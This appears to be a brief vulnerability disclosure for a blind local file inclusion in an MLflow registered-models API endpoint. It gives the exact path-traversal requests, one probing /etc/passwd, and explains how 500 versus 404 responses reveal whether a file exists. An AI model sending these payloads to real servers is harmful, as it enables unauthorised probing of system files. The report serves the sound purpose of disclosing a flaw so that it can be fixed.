A blind LFI exists in /ajax-api/2.0/mlflow/registered-models/get?name=
The response from the server is different depending on if the file exists on the local file system or not. When the arbitrary local file exists, the server responds with 500 INTERNAL SERVER ERROR and when it doesn’t exist it returns a 404 NOT FOUND response.
GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/passwd HTTP/1.1
Returns 500 INTERNAL SERVER ERROR
because /etc/passwd exists in the server.
GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/doesNotExist
Returns 404 NOT FOUND
because /etc/doesNotExist isn’t a file on the local filesystem.